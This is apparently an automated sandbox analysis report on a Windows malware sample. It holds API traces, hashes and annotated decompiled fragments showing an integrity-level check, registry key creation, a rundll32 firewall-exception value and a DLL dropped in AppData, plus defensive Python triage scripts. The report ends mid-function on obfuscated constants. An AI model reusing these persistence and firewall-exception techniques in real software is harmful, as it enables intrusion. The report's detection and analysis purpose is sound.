                                                                • CreateFileA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C0000000,00000003,00000000,00000002,00000080,00000000,0040277A,kernel32,ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion), ref: 00402460
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll
                                                                • API String ID: 823142352-3381594270
                                                                • Opcode ID: 139324e71a8c36c5130394a5df550e6d190b21a14e9d9c9e43c0df9683eb5859
                                                                • Instruction ID: ff8c075f96e07a53c4bd9049e851b07d0e2c8bcf8f5b2bcd91e448d957cd5608
                                                                • Opcode Fuzzy Hash: 139324e71a8c36c5130394a5df550e6d190b21a14e9d9c9e43c0df9683eb5859
                                                                • Instruction Fuzzy Hash: BEB092713C830138F43821305E5BF1904085340B14E31821AB341B90C065C43204011C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 02A0EB86
                                                                • VirtualProtect.KERNELBASE(?,?,00000000), ref: 02A0EDD0
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.830628522.0000000002A0B000.00000040.00000001.sdmp, Offset: 02A0B000, based on PE: false
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                                                                • Instruction ID: c5227310105b37686d558e2656f9a7fb105ed7edb945605f366c039e245dbc60
                                                                • Opcode Fuzzy Hash: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                                                                • Instruction Fuzzy Hash: ACB198B5A00209DFCB08CF84D995EAEBBB6BF88314F148558E9099B395D731E981CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SendMessageA.USER32(0000000E,00000080,00000001,00000000,?,0045BF1C), ref: 00463FF9
                                                                • KiUserCallbackDispatcher.NTDLL(0000000E,000000F2,00000000,?,0045BF1C), ref: 0046400C
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: CallbackDispatcherMessageSendUser
                                                                • String ID:
                                                                • API String ID: 62070635-0
                                                                • Opcode ID: c8ed50d631702e0734efd22640d8f66763db9338c46b6be01784bc4a13b8ad10
                                                                • Instruction ID: 830d196b7311f67b2d7798a962f89d43c43f17374a132fbd4a2f4d390e135460
                                                                • Opcode Fuzzy Hash: c8ed50d631702e0734efd22640d8f66763db9338c46b6be01784bc4a13b8ad10
                                                                • Instruction Fuzzy Hash: 76417471740340AFEB50EF69DC86F5637A8AB45704F54407AFA01EF2D2EA79AC40876D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetEnhMetaFileA.GDI32(0046EE34), ref: 0046EC31
                                                                • GetEnhMetaFileA.GDI32(0046EE34), ref: 0046EC3B
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: FileMeta
                                                                • String ID:
                                                                • API String ID: 3969797694-0
                                                                • Opcode ID: f08b476f27855627b1480933331b7e74e534c47eacd3e47a5e700b8dff369f0d
                                                                • Instruction ID: 79144a1ec193b664d7567bf7be6c47d99a2cbc132f2fda432124f98289a5e8d1
                                                                • Opcode Fuzzy Hash: f08b476f27855627b1480933331b7e74e534c47eacd3e47a5e700b8dff369f0d
                                                                • Instruction Fuzzy Hash: 5831E4B868131569D90076A3C813F2E75F95D00B0872160FBB949B51C2FBFFBA22456F
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 02A0E6A4
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.830628522.0000000002A0B000.00000040.00000001.sdmp, Offset: 02A0B000, based on PE: false
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID: VirtualAlloc
                                                                • API String ID: 4275171209-164498762
                                                                • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                • Instruction ID: 57b546486f7477c2d20faf027ff1849b5dee0e48f4e04bccc6fd01175a279cc9
                                                                • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                • Instruction Fuzzy Hash: F211BF60C082C9EEEF01D7E89549BFFBFB15F11704F044098D5842B2C2D6BA17588BB2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E004029FB() {
                                                                				int _t6;
                                                                				void _t8;
                                                                
                                                                				// 0xffffffff = GetCurrentProcess() pseudo-handle, 8 = TOKEN_QUERY, 0x447223 receives the token handle
                                                                				if(OpenProcessToken(0xffffffff, 8, 0x447223) == 0) {
                                                                					L3:
                                                                					return 0xffffffffffffffff; // -1: integrity level could not be read
                                                                				} else {
                                                                					// 0x19 = TokenIntegrityLevel; 0x4473af is a 0x1388-byte buffer that receives the TOKEN_MANDATORY_LABEL
                                                                					_t6 = GetTokenInformation( *0x447223, 0x19, 0x4473af, 0x1388, 0x447227); // executed
                                                                					if(_t6 == 0) {
                                                                						goto L3;
                                                                					} else {
                                                                						_t8 =  *0x4473af; // 0x4473b7: Label.Sid, pointing 8 bytes into the same buffer (past the PSID + Attributes header)
                                                                						_t1 = _t8 + 8; // 0x3000: SubAuthority[0] of the S-1-16-x label SID (revision, count and authority occupy the first 8 bytes)
                                                                						return  *_t1 & 0x0000ffff; // 0x1000 low, 0x2000 medium, 0x3000 high, 0x4000 system
                                                                					}
                                                                				}
                                                                			}
                                                                
                                                                Instruction addresses: 0x00402a0b, 0x00402a37, 0x00402a3a, 0x00402a0d, 0x00402a24, 0x00402a2b, 0x00402a2d, 0x00402a32, 0x00402a36

                                                                APIs
                                                                • OpenProcessToken.ADVAPI32(000000FF,00000008,00447223,004011A7), ref: 00402A04
                                                                • GetTokenInformation.ADVAPI32(00000019,004473AF(TokenIntegrityLevel),00001388,00447227,000000FF,00000008,00447223,004011A7), ref: 00402A24
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: Token$InformationOpenProcess
                                                                • String ID:
                                                                • API String ID: 1620003723-0
                                                                • Opcode ID: d1a2152ca6465e0457702ce36fbf15cbc0bd39cbe696fb625b4e11e6c162b277
                                                                • Instruction ID: 073d114db5adfdc9224bb139601dccd4843a10b009ba03c92ef0aeecab0c0efa
                                                                • Opcode Fuzzy Hash: d1a2152ca6465e0457702ce36fbf15cbc0bd39cbe696fb625b4e11e6c162b277
                                                                • Instruction Fuzzy Hash: E3D0127178921129EA106711AC47E227350A714B16F1409A23A50F41E1DFDCC951E618
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%
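E004029FB above reads the current process's integrity level by hand: it asks GetTokenInformation for TokenIntegrityLevel, follows the Sid pointer at the start of the returned TOKEN_MANDATORY_LABEL (0x4473b7, eight bytes into the buffer at 0x4473af) and takes the 16 low bits of SubAuthority[0], eight bytes into the SID. The script below is an added example, not code from the report or from the sample: it decodes the same 32-bit layout from a constructed byte buffer, but walks the SID header instead of trusting the fixed offsets. The buffer contents, the reuse of the report's base address, and the function names parse_sid, integrity_from_label and build_label are assumptions made for the example.

```python
import struct

# Well-known integrity RIDs: the last sub-authority of the S-1-16-<rid> label SID
INTEGRITY_LEVELS = {
    0x0000: "untrusted",
    0x1000: "low",
    0x2000: "medium",
    0x2100: "medium-plus",
    0x3000: "high",
    0x4000: "system",
    0x5000: "protected-process",
}


def parse_sid(buf, off):
    """Parse a binary SID at buf[off:]. Returns (string form, authority, sub-authorities)."""
    if off + 8 > len(buf):
        raise ValueError("SID header truncated")
    revision, count = buf[off], buf[off + 1]
    if revision != 1 or count > 15 or off + 8 + 4 * count > len(buf):
        raise ValueError("malformed SID")
    authority = int.from_bytes(buf[off + 2:off + 8], "big")        # 48-bit, big-endian
    subs = list(struct.unpack_from("<%dI" % count, buf, off + 8))  # little-endian DWORDs
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs))), authority, subs


def integrity_from_label(buf, base):
    """buf holds a TOKEN_MANDATORY_LABEL as a 32-bit process sees it at virtual
    address `base`. Returns (label SID string, integrity level name)."""
    sid_ptr, _attributes = struct.unpack_from("<II", buf, 0)  # SID_AND_ATTRIBUTES {PSID Sid; DWORD Attributes}
    sid_off = sid_ptr - base                                   # Windows places the SID inside the same buffer
    if not 0 <= sid_off < len(buf):
        raise ValueError("Label.Sid does not point into the buffer")
    sid_str, authority, subs = parse_sid(buf, sid_off)
    if authority != 16 or not subs:                            # 16 = SECURITY_MANDATORY_LABEL_AUTHORITY
        raise ValueError("not a mandatory-label SID: " + sid_str)
    rid = subs[-1]
    # The sample reads *(Sid + 8) & 0xffff, i.e. SubAuthority[0] of a one-sub-authority SID
    return sid_str, INTEGRITY_LEVELS.get(rid & 0xFFFF, "unknown(0x%x)" % rid)


def build_label(base, rid):
    """Constructed test buffer (assumption, not captured from the sample): an 8-byte
    SID_AND_ATTRIBUTES header followed by S-1-16-<rid>. Sid points to base+8, which
    matches the 0x4473b7 = 0x4473af + 8 seen in the decompilation."""
    sid = bytes([1, 1]) + (16).to_bytes(6, "big") + struct.pack("<I", rid)
    header = struct.pack("<II", base + 8, 0x60)  # 0x60 = SE_GROUP_INTEGRITY | SE_GROUP_INTEGRITY_ENABLED
    return header + sid


if __name__ == "__main__":
    sample = build_label(0x4473AF, 0x3000)  # 0x3000 is the value the sandbox run observed (high integrity)
    print(integrity_from_label(sample, 0x4473AF))
```

Validating the SID revision, sub-authority count and authority before reading the RID is what keeps this safe on a buffer you did not produce yourself; the sample skips all of it because it only ever reads its own process token.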

                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: _lwrite
                                                                • String ID:
                                                                • API String ID: 2358117443-0
                                                                • Opcode ID: a98772997b5cebd636563834bc2ff0b52268ae76ff9d7c2a1a51268aefee32b8
                                                                • Instruction ID: d74d011d89869e06707681ba513c0c2507c4ca50609a269aa28408732e69a808
                                                                • Opcode Fuzzy Hash: a98772997b5cebd636563834bc2ff0b52268ae76ff9d7c2a1a51268aefee32b8
                                                                • Instruction Fuzzy Hash: FDA0023D1881059BCA891FE0ED0D518FA26B68AF033D002F1F122960FCCEB806888B1E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,0045F68A), ref: 0045F656
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: CallbackDispatcherUser
                                                                • String ID:
                                                                • API String ID: 2492992576-0
                                                                • Opcode ID: a6df5db8eface0c795cb8d611373b8ba130475857d65a06412feaf912d40d74d
                                                                • Instruction ID: 35fbb40646296d4b8b8e5ee90de4c5d7ccfe59de5da4f71d53db082f5123fc6f
                                                                • Opcode Fuzzy Hash: a6df5db8eface0c795cb8d611373b8ba130475857d65a06412feaf912d40d74d
                                                                • Instruction Fuzzy Hash: BD51B330A002046BDB51AF3A8985B5A37A5AF05309F44057BEC15AB3A7DA7CDC4D879E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00463354
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: InfoParametersSystem
                                                                • String ID:
                                                                • API String ID: 3098949447-0
                                                                • Opcode ID: 33cf023fe12c1a5044983219b0e91dc1a07c6b11317f1667649011d6917d079f
                                                                • Instruction ID: e2350e146a6b404beab9bff9c3d61726c6451968806f6f626f91476a5eff24e0
                                                                • Opcode Fuzzy Hash: 33cf023fe12c1a5044983219b0e91dc1a07c6b11317f1667649011d6917d079f
                                                                • Instruction Fuzzy Hash: AA31FC307042449BD750FF65DC42B9A37E4AB45305F8580BABD48DB3D7EE38AD488B2A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • LoadCursorA.USER32(00000000,00000000,?,?,?,0045BE44,00462A8B,?,?,00000000,?,004509CA), ref: 00462E40
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: CursorLoad
                                                                • String ID:
                                                                • API String ID: 3238433803-0
                                                                • Opcode ID: 82a71a33109b107e9597ac4a0d59e63066a31261b91fa2f18bcc2dda9451d79a
                                                                • Instruction ID: 64e4855b495746078dc227f559d9b9d48743bdbcd117f28f12841b37dab67070
                                                                • Opcode Fuzzy Hash: 82a71a33109b107e9597ac4a0d59e63066a31261b91fa2f18bcc2dda9451d79a
                                                                • Instruction Fuzzy Hash: CBF08221B05A04269660153E8DD0E6B7294DB91735B24033BF93EC73D1D7BB6C42419B
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0040247D(char* _a4, int _a8, char* _a12, int _a16) {
                                                                				long _t9;
                                                                
                                                                				// *0x4433fc is the HKEY that E00402AD2's RegCreateKeyExA stored there; _a4 = value name, _a8 = dwType,
                                                                				// _a12 = data, _a16 = data size. The shift chain is the decompiler's rendering of the Reserved argument,
                                                                				// which must be 0 (with x86's 5-bit shift counts it is 0x8eda << 9 << 21 << 7 = 0 in 32 bits).
                                                                				_t9 = RegSetValueExA( *0x4433fc, _a4, 0x8eda << 0x49 << 0x55 << 0x67, _a8, _a12, _a16); // executed
                                                                				return _t9;
                                                                			}
                                                                
                                                                Instruction addresses: 0x004024a7, 0x004024b2

                                                                APIs
                                                                • RegSetValueExA.ADVAPI32(?,00008EDA,?,?,?,?,?,00401192,00440864,00000001,00440C4C,00000000,00440C4C,00440C4C,:*:Enabled:rundll32,00440C4C), ref: 004024A7
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID:
                                                                • API String ID: 3702945584-0
                                                                • Opcode ID: a25293c8548623f84ca04117c346fc14c8bbbd9d762087e8b2dc664fc2d28353
                                                                • Instruction ID: 3b05aa3d1854da898228568b34594d8277203aedbfe872bd4059925498695a30
                                                                • Opcode Fuzzy Hash: a25293c8548623f84ca04117c346fc14c8bbbd9d762087e8b2dc664fc2d28353
                                                                • Instruction Fuzzy Hash: 0AD01277200159BBEF055E85EC01DAA3A9FEBC9784F008035FA1199260D9B6CB21E794
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%
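The RegSetValueExA trace line above carries the string ":*:Enabled:rundll32", the tail of a value in the legacy Windows Firewall "<path>:*:Enabled:<display name>" authorized-application format. The script below is an added example, not code from the report or from the sample: it parses values in that format and flags the traits a hunter would look for (an enabled exception for a file under AppData or Temp, a DLL as the target, a display name borrowed from a system DLL host). The registry location in LIST_KEY is assumed (the report does not print it), the three sample values are constructed for the example (the third reuses the dropped-DLL path shown in the CreateFileA trace), and the function names parse_entry and triage are hypothetical.

```python
import ntpath
import re

# Assumed (well-known legacy) location of the list; the report only shows the value-data fragment
LIST_KEY = (r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters"
            r"\FirewallPolicy\StandardProfile\AuthorizedApplications\List")

USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.I)
SCRIPT_HOSTS = {"rundll32", "regsvr32", "mshta", "wscript", "cscript", "powershell"}


def parse_entry(value):
    """Split '<path>:<scope>:<Enabled|Disabled>:<display name>' into its parts.
    The path contains a drive-letter ':' so the split is done from the right."""
    parts = value.rsplit(":", 3)
    if len(parts) != 4 or not parts[0]:
        raise ValueError("not an AuthorizedApplications entry: %r" % value)
    path, scope, state, name = parts
    return {"path": path, "scope": scope, "enabled": state.lower() == "enabled", "name": name}


def triage(value):
    """Reasons an entry looks like a malware-created firewall exception (empty list = nothing odd)."""
    e = parse_entry(value)
    stem = ntpath.basename(e["path"]).rsplit(".", 1)[0].lower()
    reasons = []
    if e["enabled"] and USER_WRITABLE.search(e["path"]):
        reasons.append("enabled exception for a file in a user-writable directory")
    if e["name"].lower() in SCRIPT_HOSTS or stem in SCRIPT_HOSTS:
        reasons.append("named after or pointing at a DLL/script host")
    if e["path"].lower().endswith(".dll"):
        reasons.append("exception target is a DLL, not an executable")
    return reasons


# Constructed sample values (not exported from the sandbox); the third reuses the report's dropped-DLL path
SAMPLES = [
    r"C:\Program Files\Mozilla Firefox\firefox.exe:*:Enabled:Firefox",
    r"C:\Windows\System32\rundll32.exe:*:Enabled:rundll32",
    r"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll:*:Enabled:rundll32",
]

if __name__ == "__main__":
    print("scanning values under", LIST_KEY)
    for v in SAMPLES:
        print(v, "->", triage(v) or "ok")
```

On a live host you would feed triage() each REG_SZ value name under LIST_KEY (the entries are keyed by path and the data repeats the path), and treat any hit under a user profile as a pivot to the dropped file's hash and the process that wrote the value.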

                                                                C-Code - Quality: 100%
                                                                			E00402AD2() {
                                                                				void* _t1;   // hKey; trace: 0x80000001 = HKEY_CURRENT_USER
                                                                
                                                                				// *0x4468e1 = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065}",
                                                                				// 0xf003f = KEY_ALL_ACCESS; the new handle is stored at 0x4433fc (used by E0040247D) and the disposition at 0x443400
                                                                				RegCreateKeyExA(_t1,  *0x4468e1, 0, 0, 0, 0xf003f, 0, 0x4433fc, 0x443400); // executed
                                                                				goto __edx;
                                                                			}
                                                                
                                                                Instruction addresses: 0x00402b00, 0x00402b03

                                                                APIs
                                                                • RegCreateKeyExA.KERNELBASE(80000001,00000000,?,00000000,000F003F,?,004433FC,00443400,0040238B,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000), ref: 00402B00
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Executed Functions

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tt_H
                                                                • API String ID: 0-1945571164
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.844554587.00007FFA331C0000.00000040.00000001.sdmp, Offset: 00007FFA331C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Executed Functions

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.792167024.00007FFA31B40000.00000040.00000001.sdmp, Offset: 00007FFA31B40000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.792167024.00007FFA31B40000.00000040.00000001.sdmp, Offset: 00007FFA31B40000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Executed Functions

                                                                C-Code - Quality: 66%
                                                                			E010A7057(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a40) {
                                                                				intOrPtr _v12;
                                                                				signed int _v16;
                                                                				intOrPtr _v20;
                                                                				short _v24;
                                                                				intOrPtr _v28;
                                                                				signed int _v32;
                                                                				intOrPtr _v36;
                                                                				char _v40;
                                                                				intOrPtr _v44;
                                                                				char _v48;
                                                                				char _v52;
                                                                				intOrPtr* _v56;
                                                                				intOrPtr _v60;
                                                                				intOrPtr _v64;
                                                                				short _v66;
                                                                				intOrPtr _v70;
                                                                				char _v74;
                                                                				short _v76;
                                                                				intOrPtr _v80;
                                                                				char _v84;
                                                                				char _v88;
                                                                				short _v90;
                                                                				intOrPtr _v94;
                                                                				intOrPtr _v98;
                                                                				intOrPtr _v102;
                                                                				intOrPtr _v106;
                                                                				intOrPtr _v110;
                                                                				intOrPtr _v114;
                                                                				intOrPtr _v118;
                                                                				intOrPtr _v122;
                                                                				intOrPtr _v126;
                                                                				intOrPtr _v130;
                                                                				intOrPtr _v134;
                                                                				intOrPtr _v138;
                                                                				intOrPtr _v142;
                                                                				intOrPtr _v146;
                                                                				intOrPtr _v150;
                                                                				intOrPtr _v154;
                                                                				intOrPtr _v158;
                                                                				intOrPtr _v162;
                                                                				intOrPtr _v166;
                                                                				intOrPtr _v170;
                                                                				char _v174;
                                                                				short _v176;
                                                                				intOrPtr _v180;
                                                                				intOrPtr _v184;
                                                                				intOrPtr _v188;
                                                                				char _v192;
                                                                				short _v194;
                                                                				intOrPtr _v198;
                                                                				intOrPtr _v202;
                                                                				intOrPtr _v206;
                                                                				char _v210;
                                                                				short _v212;
                                                                				intOrPtr _v216;
                                                                				intOrPtr _v220;
                                                                				intOrPtr _v224;
                                                                				intOrPtr _v228;
                                                                				intOrPtr _v232;
                                                                				intOrPtr _v236;
                                                                				intOrPtr _v240;
                                                                				intOrPtr _v244;
                                                                				intOrPtr _v248;
                                                                				intOrPtr _v252;
                                                                				intOrPtr _v256;
                                                                				intOrPtr _v260;
                                                                				intOrPtr _v264;
                                                                				intOrPtr _v268;
                                                                				intOrPtr _v272;
                                                                				intOrPtr _v276;
                                                                				intOrPtr _v280;
                                                                				intOrPtr _v284;
                                                                				intOrPtr _v288;
                                                                				intOrPtr _v292;
                                                                				intOrPtr _v296;
                                                                				intOrPtr _v300;
                                                                				intOrPtr _v304;
                                                                				intOrPtr _v308;
                                                                				intOrPtr _v312;
                                                                				intOrPtr _v316;
                                                                				intOrPtr _v320;
                                                                				intOrPtr _v324;
                                                                				intOrPtr _v328;
                                                                				intOrPtr _v332;
                                                                				intOrPtr _v336;
                                                                				intOrPtr _v340;
                                                                				intOrPtr _v344;
                                                                				intOrPtr _v348;
                                                                				intOrPtr _v352;
                                                                				char _v356;
                                                                				void* _v360;
                                                                				char _v380;
                                                                				void* _v384;
                                                                				char _v404;
                                                                				intOrPtr _v412;
                                                                				char _v428;
                                                                				void* __edi;
                                                                				intOrPtr _t236;
                                                                				intOrPtr _t240;
                                                                				void* _t246;
                                                                				char* _t247;
                                                                				struct HINSTANCE__* _t249;
                                                                				_Unknown_base(*)()* _t250;
                                                                				intOrPtr _t251;
                                                                				intOrPtr _t260;
                                                                				_Unknown_base(*)()* _t262;
                                                                				char* _t269;
                                                                				_Unknown_base(*)()* _t271;
                                                                				intOrPtr _t272;
                                                                				intOrPtr _t279;
                                                                				_Unknown_base(*)()* _t281;
                                                                				void* _t282;
                                                                				_Unknown_base(*)()* _t287;
                                                                				void* _t288;
                                                                				_Unknown_base(*)()* _t291;
                                                                				void* _t292;
                                                                				signed int _t293;
                                                                				intOrPtr _t295;
                                                                				intOrPtr _t302;
                                                                				signed int _t337;
                                                                				signed int _t339;
                                                                				intOrPtr* _t340;
                                                                				intOrPtr* _t345;
                                                                				void* _t352;
                                                                				signed int _t358;
                                                                				intOrPtr _t362;
                                                                				intOrPtr* _t366;
                                                                				signed int _t374;
                                                                				signed int _t380;
                                                                				void* _t383;
                                                                				void* _t384;
                                                                				void* _t385;
                                                                				intOrPtr* _t387;
                                                                				void* _t389;
                                                                				CHAR* _t390;
                                                                				void* _t391;
                                                                				intOrPtr* _t392;
                                                                
                                                                				_v12 = __ecx;
                                                                				_v20 = __edx;
                                                                				_v16 = 0;
                                                                				_t337 = 0;
                                                                				_v88 = 0;
                                                                				_v56 = 0;
                                                                				_v356 = 0xe231e201;
                                                                				_v352 = 0xe22fe232;
                                                                				_v348 = 0xe212e221;
                                                                				_v344 = 0xe225e223;
                                                                				_v340 = 0xe220e203;
                                                                				_v336 = 0xe264e23e;
                                                                				_v332 = 0xe27ee279;
                                                                				_v328 = 0xe261e279;
